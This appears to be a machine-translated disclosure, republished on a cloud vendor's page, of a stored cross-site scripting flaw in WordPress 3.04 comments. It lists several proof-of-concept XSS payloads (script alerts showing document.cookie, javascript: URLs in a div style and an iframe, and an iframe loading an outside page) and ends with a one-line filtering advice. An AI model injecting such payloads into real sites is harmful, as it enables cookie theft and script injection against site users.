WordPress 3.04XSS Cross-Site vulnerability and repair

Source: Internet
Author: User

Information submission: QQ kiss (crack8_at_qq.com)
Affected Versions: 3.04

The previous version is not tested. Theoretically, the vulnerability is described as follows:

Author: QQ kiss Team: Crack8 Team

Blog http://hi.baidu.com/qhack8

The following prompt indicates that you can submit a comment in HTML code.
Just conduct a habitual test to see if it can be X.
Then, test the XSS statement in the K8 all-around hacker notepad and find that

Log in as an administrator and submit the following statement for comments

During the test, it is found that comments are made by common users, even if the administrator passes

The submitted XSS code will also be cleared by WP (this is the case for a few tests)

From the WP database, the submitted login with the USER permission is cleared.

Other statements have not been tested. The following code contains Trojans, cookies, etc.

The HTML code is very simple. I will not explain the so-called XSS.

Test method:

> <Script> alert (document. cookie) </script>

=> <Script> alert (document. cookie) </script>

<Script> alert (document. cookie) </script>

<Script> alert (Crack8_Team) </script>

<Div style = "background-image: url (javascript: alert (Crack8_Team)">

<Iframe src = javascript: alert (Crack8_Team)> </IFRAME>

<Iframe src = http://hi.baidu.com/hkqqkiss> </IFRAME>

Finally, I wish you a good year without any technical skills.
Security suggestions:
Background settings filter submitted code

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.